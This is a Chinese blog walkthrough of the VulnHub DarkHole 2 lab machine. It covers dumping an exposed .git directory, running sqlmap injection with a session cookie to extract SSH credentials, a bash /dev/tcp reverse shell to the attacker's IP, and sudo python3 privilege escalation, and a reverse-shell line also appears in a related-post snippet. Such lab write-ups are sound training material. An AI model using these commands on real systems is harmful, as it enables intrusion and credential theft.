vuluhub-darkhole2 打靶记录

已于 2023-06-14 17:15:22 修改
阅读量139 收藏
点赞数
文章标签: 安全
于 2023-06-14 16:55:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lcc001114/article/details/131208217
版权

本次攻击机kali:192.168.3.111

靶机:192.168.3.148

提示:不要浪费时间进行暴力破解;使用Vmware虚拟机

靶机地址:DarkHole: 2 ~ VulnHub

信息收集

主机发现

这里攻击机和靶机我设置了桥接模式也可以用arp-scan -l  来扫

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.3.0/24
 

如果分辨不出来的话可以在以下地方查一下mac地址

主机信息探测

nmap -sS -sV -T4 -p- 192.168.3.148

 扫一下端口和服务,可知靶机只开启了22和80端口

网站探测

我们访问一下站点,页面存在登陆接口Login。

点击login,跳转至登陆页面

没有找到有用的信息。
接下来,扫描一下后台目录

发现存在git泄漏,并访问.git目录

使用 gitdumper 分析 git 文件

下载 git-dumper 工具

https://github.com/arthaud/git-dumper
可源码安装,也可直接用pip3安装

pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn git-dumper

 下载 git 文件夹内容:

git-dumper http://192.168.184.143/.git/ git123

 下载到桌面记得给个权限

切换到 git123 文件, 查看日志

 可以发现有三次提交,可以使用 diff 查看提交的区别

我们这里直接看第二条

git diff a4d900a8d85e8938d3601f3cef113ee293028e10

 我们可以得到账号:lush@admin.com 密码:321

尝试登陆

 

sqlmap

 登录之后,页面很简单,注意到地址栏中存在id值,简单尝试一下发现存在sql注入,那就直接sqlmap跑起来

记住要加上cookie

爆库

sqlmap --cookie=PHPSESSID="dvb0ru1j3jgevjvfef7l0hrbkr" -u http://192.168.3.148/dashboard.php?id=1 --dbs --batch

 

 爆表

sqlmap --cookie=PHPSESSID="dvb0ru1j3jgevjvfef7l0hrbkr" -u http://192.168.3.148/dashboard.php?id=1 -D darkhole_2 --tables --batch

 爆列

sqlmap --cookie=PHPSESSID="dvb0ru1j3jgevjvfef7l0hrbkr" -u http://192.168.3.148/dashboard.php?id=1 -D darkhole_2 -T users --columns --batch

sqlmap --cookie=PHPSESSID="dvb0ru1j3jgevjvfef7l0hrbkr" -u http://192.168.3.148/dashboard.php?id=1 -D darkhole_2 -T ssh --columns --batch

 爆列的内容这里爆ssh的

sqlmap --cookie=PHPSESSID="dvb0ru1j3jgevjvfef7l0hrbkr" -u http://192.168.3.148/dashboard.php?id=1 -D darkhole_2 -T ssh -C id,user,pass --dump --batch

 

 可以看到表 ssh,用户名和密码是 jehad,fool

尝试ssh登录,成功登录

 成功登录,我们查看第一个flag

 获取losy用户shell

看一下历史命令history

 发现可疑命令

 

 执行后,发现是losy用户权限

kali上编写反弹shell,并起http服务

echo 'bash -i >& /dev/tcp/192.168.3.111/6666 0>&1' > shell 
python -m http.server 8000

 靶机上,将shell文件,下载到tmp文件夹下然后给个权限

 

知道路径了现在开始监听并反弹

 

提权到root

 sudo -l提示需要输入密码,而我们现在还不知道losy用户密码

继续查看历史命令

 

 发现losy用户密码为gang

 ssh登录losy

 sudo -l 查询发现可以使用python3提权

sudo python3 -c 'import os; os.system("/bin/bash")'

 

lcc001114
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
地空战-打靶游戏.rar
04-07
地空战-打靶游戏.rar
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3002
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
DarkHole_2
追求卓越,技术流~
01-14 1457
文章目录靶机环境一、信息收集二、 漏洞利用三、权力提升总结 靶机环境 攻击机:kali IP:192.168.247.129 靶机:DarkHole_2 IP:192.168.247.131 一、信息收集 输入:nmap -A -T4 -sV -p- 192.168.247.131 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST Nmap scan report for 192.168.247.131 Host is u
靶机渗透练习45-DarkHole-2
hirak0的博客
04-19 1952
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Forc 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.143 注:靶机与K
darkhole_2靶机打靶过程及思路
qq_52610024的博客
06-25 566
6.使用3493进行提权失败,查看账号目录下的.bash_history,提示发现命令执行,且提示开放了9999。7.发现该账号的命令执行历史记录下提示存在该账号存在sudo权限,输入history记录下的密码,成功执行。4.发现后台页面url地址上有id=1,推测存在sql注入,手工进行union联合注入,得到账号密码。再次查看login.php,里面存在默认用户名和密码,回到首页登录成功,成功进入后台。,访问该路径,成功执行命令,执行反弹语句,成功拿到losy账号权限。成功得到root账号的权限。...
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 933
VulnHub-DarkHole: 2靶机详细渗透过程
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码
04-17
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源...
Unity3D-Ai-技能-闪现-加速-打靶-鼠标指针隐藏
12-25
使用版本:2020.3.32 Ai概要: ...打靶概要: 一、从固定地点每隔固定时间发射飞盘 二、从固定地点每隔固定时间生成气球 玩家概要: 一:跳跃 二、血条 操作概要: 一、鼠标指针进入游戏窗口时隐藏
VB Access 打靶记录系统全套源码和数据库
01-19
源码说明: 完整可用的打靶记录系统源码,用于学生或新兵军训打靶记录,这是以前本人自己做的,绝对是原创。可作为初学者研究Access数据库,也可以在此基础上修改成其他系统,如学生成绩管理系统、体育比赛记录系统...
【前端素材】小游戏-3d射箭打靶游戏.zip
04-04
【技术分析】 ... CSS,可以帮助把网页外观做得更加美观; JavaScript,是一种轻量级的解释型编程语言; ... Bootstrap 是快速开发 Web 应用程序的前端工具包。...AJAX,创建交互式网页应用的网页开发技术。...
VulnHub靶机渗透实战8-darkhole-2
随心所欲不逾矩
11-22 1323
在历史命令记录中: wget 下载了一个 反弹shell,那我们也要来反弹shell,传shell到靶机上。看到第2次更新时,login.php使用了默认凭证。看到 and id =1,做了防sql注入,那是不是代表登入进去之后就存在sql注入了。因此,我们将 HEAD 切换到该提交,并查看login.php,在这里我们就已经发现账号密码了。history查看一下,losy用户的密码是:gang.网络模式的话,我喜欢用桥接,直接桥接。邮箱账户:[email protected],密码:321.
DarkHole_2打靶记录
wwd180的博客
06-14 163
实验主机:攻击机kali 靶机DarkHole实验目标:取得 root 权限 + 2 Flag实验网络:桥接模式。
.git文件泄露的一次渗透darkhole2
tpaer的博客
10-03 1064
这是一个困难难度的靶场,通过不小心泄露的.git文件收集信息,再利用漏洞脱库登录,最后利用rce漏洞进行提权。也可以用通用来打。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 916
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
安全警钟】APP如何筑起坚不可摧的防御,抵御黑客攻击?
最新发布
NSME1的博客
05-20 138
做好安全防御
Web应用防火墙的重要性
XRY_XIAO的博客
05-20 339
Web应用防火墙的重要性
Llama 3 模型家族构建安全可信赖企业级AI应用之 Code Llama (一)
段智华的博客
05-17 853
1、Llama开源模型家族大模型技术、工具和多模态详解:学员将深入了解Meta Llama 3的创新之处,比如其在语言模型技术上的突破,并学习到如何在Llama 3中构建trust and safety AI。8、Llama 3中的DPO原理、算法、组件及具体实现及算法进阶:学习Llama 3中结合使用PPO和DPO算法,剖析DPO的原理和工作机制,详细解析DPO中的关键算法组件,并通过综合项目八从零开始动手实现和测试DPO算法,同时课程将解密DPO进阶技术Iterative DPO及IPO算法。
富格林:梳理可信经验保障安全
fgl100的博客
05-13 241
通过多渠道的收集和分析找到市场的波动趋势,在根据趋势的变化进行交易。如果投资者对趋势变化没有把握的话,可以多留意正规专业的交易平台讯息,一般情况下都会给大家分享市场最新的走势变化,阅读贵金属知识课堂的文章就能够知道很多基本面消息,也能学到各种技术分析方法。富格林悉知,现货黄金被视作一种稳健的投资工具,因其对抗通货膨胀和政治不确定性的能力而备受青睐。如果处于亏损状态的时候,应该保持冷静,理性分析市场波动情况,如果亏损情况严重,应该及时离场保住自己的最大利益,重新调整心态再进场。
【计算机网络】http协议的原理与应用,以及https是如何保证安全传输的
heikewhite的博客
05-14 880
TLS的全称是Transport Layer Security,即安全传输层协议,最新版本的TLS(Transport Layer Security,传输层安全协议)是IETF(Internet Engineering Task Force,Internet工程任务组)制定的一种新的协议,它建立在SSL 3.0协议规范之上,是SSL 3.0的后续版本。但是无连接有两种方式,早期的http协议是一个请求一个响应之后,直接就断开了,但是现在的http协议1.1版本不是直接就断开了,而是等几秒钟,
蒙特卡洛打靶matlab
05-12
蒙特卡洛打靶是一种常用的数值模拟方法,可以用来估计某个过程的概率分布或期望值。在打靶问题中,我们需要估计一个枪手打中靶心的概率。 下面是使用 Matlab 实现蒙特卡洛打靶的代码示例: ```matlab % 定义打靶...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值